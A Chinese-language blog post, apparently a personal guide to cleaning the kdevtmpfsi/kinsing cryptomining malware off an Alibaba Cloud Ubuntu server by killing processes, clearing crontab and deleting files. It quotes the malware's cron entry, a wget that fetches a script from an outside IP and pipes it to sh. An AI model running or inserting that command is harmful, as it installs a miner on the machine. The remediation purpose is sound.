阿里云Ubuntu下处理 kdevtmpfsi进程——挖矿病毒_服务器病毒处理
今天做大数据实验,忽然发现CPU使用率,MEMORY使用率突然变得极其不正常,CPU使用率竟然达到了100%。因为解决问题时忘记截图,下面有些图是从网上找的,我会在下面贴出链接。
1、使用top ,找到相关进程
top
2.查找进程相关信息(进程目录,相关联的其它进程),这里的14538是top后查看到的PID,如上图所示。
systemctl status 14538
kinsing 是kdevtmpfsi背后的守护进程,需要先杀kinsing然后再杀kdevtmpfsi。
3.杀死进程
kill -9 14538
kill -9 20752
4.清理定时任务
查看定时任务
crontab -l
查看到结果:* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
清理定时任务
crontab -e
我这里选择的是第二个选项,使用vim,然后把打开的文件中的内容全部删除。
Esc ----> : -----> wq! 保存退出。
6.删除文件
sudo rm -rf /tmp/kdevtmpfsi
sudo rm -rf /tmp/kinsing
sudo rm -rf /var/tmp/kinsing
尖叫提醒:
可以按照下面两条指令,查找这两个病毒文件,这样找的比较彻底,然后去对应目录删除
find / -name kdevtmpfsi
find / -name kinsing
参考链接: